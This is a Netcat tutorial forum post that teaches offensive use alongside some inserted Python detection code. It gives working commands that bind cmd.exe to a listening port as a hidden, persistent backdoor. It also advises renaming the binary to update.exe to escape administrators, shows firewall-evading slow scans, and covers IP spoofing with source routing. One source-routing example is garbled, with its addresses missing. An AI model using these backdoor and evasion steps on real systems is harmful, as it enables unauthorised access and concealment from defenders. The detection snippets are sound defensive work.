Forum Thread: Netcat Tutorial for Newbies


In summary, Netcat makes and accepts TCP and UDP connections. That is all! Netcat writes and reads data over this type of connection until it is closed. It provides a basic TCP/UDP networking subsystem that allows users to interact, manually or through scripts, with network applications and services at the application layer. It lets us view raw TCP and UDP data before it is wrapped by the next layer up, such as FTP, SMTP, or HTTP. Before continuing, I must tell you that you will need to have Netcat in C:\WINDOWS\System32, for reasons that are not essential to this manual.


The basic command line for Netcat is nc options host ports, where host is the IP address that you want to examine and ports is either a single port, a range of ports, or a series of ports separated by spaces. Let's take a look at each of the options.

-d Allows nc to work silently, detached from the MS-DOS command prompt.
-e <command> A listening nc executes <command> the instant someone connects to the port on which it is listening.
-i <seconds> Waiting interval, which is the amount of time nc will wait between two successive sends of data.
-g <path-list> You can specify up to 8 -g options on the command line to force your nc traffic to pass through certain IP addresses.
-G <hop pointer> Lets you define which IP address will be the next hop within the path indicated with the -g option.
-l Turns on nc's listening mode.
-L Turns on nc's listening mode and keeps listening after a connection ends ("listen harder").
-n Tells nc not to perform any host name lookups.
-o <filehex> Performs a hexadecimal dump of the data and stores it in the file <filehex>.
-p <port> Specifies the local port nc should use.
-r nc will choose local and remote ports at random.
-s Specifies the source IP address to use when making connections.
-t Lets nc handle the negotiation of Telnet options.
-u Tells nc to use UDP instead of TCP.
-v Verbose mode: reports the status of nc; a second -v gives more information.
-w <seconds> Controls how long nc will wait before terminating a connection.
-z Tells nc to send only the amount of data needed to find out which ports are listening.


If you run the nc.exe -l -p 4455 -e cmd.exe command from a command prompt window on a Windows NT or Windows 2000-based platform, anyone performing a Telnet to port 4455 on that platform will encounter a DOS shell without having to log in to it.

Quite elegant, but also a bit scary. Almost without effort we get a command prompt on the attacked system. Naturally, on Windows NT and Windows 2000 systems, you will have the same privileges and services as the user running Netcat. If we create a back door this way on Windows 95 or Windows 98, we will have complete control.

Let's look at this command in more depth. Remember that by default Netcat runs in the DOS window from which it was started, which means that the command window has to remain open while Netcat is running. We will use the -d option to detach it from the command prompt.

C:\> nc.exe -l -p 4455 -d -e cmd.exe

This way, we can hide a backdoor based on Netcat.

However, if someone performs a Telnet to port 4455 and connects, as soon as the connection is terminated Netcat will think that its work is over and will stop listening. To avoid this we will use the -L option, telling Netcat to keep listening even after the connection is finished.

C:\> nc.exe -p 4455 -e cmd.exe -L -d

This will allow us to return to the system until the system administrator discovers the back door. To avoid being discovered, we can rename nc.exe to anything else. Note: in this example I have nc.exe in C:\ and not in C:\Windows\System32.

Anyone can overlook something as seemingly harmless as update.exe. Another feature of Netcat is that if we run it without any options on the command line, it will prompt us to enter them on the first line of standard input.
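For defenders, the renaming trick means the image name is a poor signal; the argument pattern is what identifies the listener. The following Python check is an added example, not part of the original post: it parses process-creation command lines (the sample events are constructed) with the option letters listed above and flags any listener bound to -e, whatever the binary is called.

```python
import shlex

# Options from the list above that take a value.
VALUE_FLAGS = set("egGiopsw")
# Constructed process-creation command lines (sample data, not from a real host).
SAMPLE_EVENTS = [
    r"C:\nc.exe -l -p4455 -e cmd.exe",
    r"C:\update.exe -p 4455 -e cmd.exe -L -d",
    r"C:\Windows\System32\ping.exe -n 4 -l 32 192.0.2.10",
    r"C:\tools\nc.exe -v -z -w 2 192.0.2.10 139-145",
]


def parse_nc_style(cmdline):
    """Return (image, flags); flags maps each option letter to its value or True."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps backslashes intact
    if not tokens:
        return "", {}
    image, flags, i = tokens[0], {}, 1
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if not tok.startswith("-"):
            continue  # host and port operands are not needed for this check
        for pos, ch in enumerate(tok[1:]):
            if ch in VALUE_FLAGS:
                rest = tok[pos + 2:]              # attached value, as in "-p4455"
                if not rest and i < len(tokens):  # separate value, as in "-p 4455"
                    rest = tokens[i]
                    i += 1
                flags[ch] = rest
                break
            flags[ch] = True
    return image, flags


def classify(cmdline):
    """Flag a listener that hands connections to a program, under any image name."""
    image, f = parse_nc_style(cmdline)
    if not (("l" in f or "L" in f) and "e" in f):
        return None
    reasons = ["listener bound to -e " + f["e"]]
    if "L" in f:
        reasons.append("persistent (-L)")
    if "d" in f:
        reasons.append("detached from console (-d)")
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name not in ("nc.exe", "nc"):
        reasons.append("image name is not nc: " + name)
    return {"port": f.get("p"), "reasons": reasons}
```

The ping line shares the -l letter but has no -e, so it is not flagged; the renamed update.exe is flagged with all four reasons.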


Because Netcat can talk to a range of ports, a very obvious use is as a port scanner. The -z option is the answer. This option tells Netcat to send a certain amount of data to a port, but only enough to know whether the port is open or not. In this case we will use the -v or -vv option, because without at least one -v we will not be able to see the result of the scan. Here I am doing a port scan of ports 139 to 145. As a result, I found that only 139, 141 and 142 are open.

But this is not the best way to do it, because some firewall applications will block a particular IP address if they receive too many connections from it in a very short period of time. To keep this from happening, Netcat allows scans to be made in a more discreet way, so discreet that they will not look like a port scan. You can use the -i option to configure a probe interval and the -r option to randomize the order. You can do the same for UDP ports just by adding the -u option to your command line.
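The firewall behaviour described above is a rate check, and pacing with -i and shuffling with -r defeats exactly that. As an added example (not part of the original post, run over a constructed connection log), the Python below compares a rate threshold with a count of distinct ports per source over a long window; the thresholds are illustrative assumptions.

```python
from collections import defaultdict, deque

# Constructed connection log: (seconds, source IP, destination port).
# 198.51.100.7 probes ports 139-145 in shuffled order, one probe every 30 s.
# 192.0.2.20 is a busy but legitimate client reconnecting to port 139.
LOG = [(30 * i, "198.51.100.7", p)
       for i, p in enumerate([142, 139, 145, 141, 143, 140, 144])]
LOG += [(100 + i, "192.0.2.20", 139) for i in range(8)]
LOG.sort()


def rate_based(log, max_conns=5, window=10):
    """Sources making more than max_conns connections within `window` seconds."""
    recent, flagged = defaultdict(deque), set()
    for ts, src, _port in log:
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] >= window:   # drop timestamps outside the window
            q.popleft()
        if len(q) > max_conns:
            flagged.add(src)
    return flagged


def port_spread(log, max_ports=4, window=3600):
    """Sources touching more than max_ports distinct ports within `window` seconds."""
    seen, flagged = defaultdict(dict), set()   # src -> {port: last time seen}
    for ts, src, port in log:
        ports = seen[src]
        ports[port] = ts
        for old in [p for p, t in ports.items() if ts - t >= window]:
            del ports[old]                     # forget ports not touched recently
        if len(ports) > max_ports:
            flagged.add(src)
    return flagged
```

On this log the rate check flags only the busy client, while the port-spread check flags only the paced scanner.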


Spoofing an IP address is simple. Firewalls that perform masquerading or network address translation rewrite IP addresses every day. These devices take a packet from an internal IP address, change the source IP address of the packet to their own IP address, send it over the network, and undo the modifications when they receive the data back from the destination. Therefore, we say that modifying the contents of the source IP address in an IP packet is simple. What is difficult is to be able to receive data sent to a spoofed IP address.

Netcat has the -s option, which allows us to specify the IP address we want. Anyone could start a port scan using the -s option to make the target think it is being scanned by Microsoft or the FBI. However, the problem comes when we want the responses sent by the scanned port to reach our real IP address. Suppose, for example, that the destination host thinks that it has received a connection request from Microsoft; it will attempt to send an acknowledgment message to that Microsoft IP. Of course, this IP address will have no idea what the host is talking about and will send a reset. How can we send the information back to the real IP address without being discovered?

Apart from attacking the target machine, the only other viable option is to use source-dependent routing. Source-dependent routing allows a network application to specify the route it wants to follow to reach its destination.

There are two types of source-dependent routing: strict and relaxed. Strict source-dependent routing means that the packet must specify each hop to make in the path until it reaches the destination host. Some routers and other network devices continue to allow strict source-dependent routing, but very few allow relaxed source-dependent routing. Relaxed source-dependent routing tells routers and network devices that the routers can do most of the routing to the target host; this process allows us to have the packet pass through our machine on its way back. Using this method, source-dependent routing can allow us to spoof an IP address and still get the answers on their return trip. Most routers ignore source-dependent routing options, but not all routers.

The -g option of Netcat allows us to specify up to 8 hops that the packet must make before arriving at its destination, for example: nc -g -g -g -g 10.10. 9.50 23 will contact the telnet port on, but if source-dependent routing options are enabled on intermediate routers, traffic will be forced to follow the route through these 4 locations before reaching its destination. If we try nc -g -g -g -g -G 12 23, we are specifying a hop pointer using the -G option. The -G option sets the hop pointer to the nth byte (in this case the twelfth), and since IP addresses are 4 bytes in length, the hop pointer will start at So on your way to, traffic will need to traverse only the last two machines (because according to the hop pointer we have already been to the first). However, on the return trip the packet will go through all 4 machines.
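Source-routed packets are recognisable on the wire, which is how a filter or sensor can drop or alert on them. The Python parser below is an added example, not part of the original post: it walks the IPv4 header options for the loose and strict source-route options of RFC 791 and reports the hop list and pointer. The addresses are constructed documentation addresses, and it assumes the -G value is written directly into the option's pointer byte.

```python
import ipaddress
import struct

SOURCE_ROUTE = {131: "loose", 137: "strict"}  # LSRR / SSRR option types (RFC 791)


def find_source_route(header):
    """Return the LSRR/SSRR option found in a raw IPv4 header, or None."""
    ihl = (header[0] & 0x0F) * 4
    if header[0] >> 4 != 4 or ihl < 20 or len(header) < ihl:
        raise ValueError("not a complete IPv4 header")
    opts, i = header[20:ihl], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:    # End of Option List
            break
        if kind == 1:    # No-Operation is a single byte
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2 or i + opts[i + 1] > len(opts):
            raise ValueError("malformed option length")
        length = opts[i + 1]
        if kind in SOURCE_ROUTE:
            if length < 3 or (length - 3) % 4 or opts[i + 2] < 4:
                raise ValueError("malformed source-route option")
            pointer = opts[i + 2]  # 1-based offset into the option; 4 = first hop
            hops = [str(ipaddress.IPv4Address(opts[i + 3 + k:i + 7 + k]))
                    for k in range(0, length - 3, 4)]
            return {"type": SOURCE_ROUTE[kind], "pointer": pointer, "hops": hops,
                    "next_hop_index": (pointer - 4) // 4}
        i += length
    return None


def build_sample(pointer):
    """Constructed 40-byte header carrying a four-hop loose source-route option."""
    hops = b"".join(ipaddress.IPv4Address("192.0.2.%d" % n).packed for n in (1, 2, 3, 4))
    opt = bytes([131, 3 + len(hops), pointer]) + hops + b"\x00"  # EOL pads to 20 bytes
    src = ipaddress.IPv4Address("198.51.100.7").packed
    dst = ipaddress.IPv4Address("203.0.113.9").packed
    return struct.pack("!BBHHHBBH4s4s", 0x40 | (20 + len(opt)) // 4, 0,
                       20 + len(opt), 0, 0, 64, 6, 0, src, dst) + opt
```

With a pointer of 12 the parser reports index 2 as the next hop, so only the last two of the four listed addresses remain to be visited, which matches the description above.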

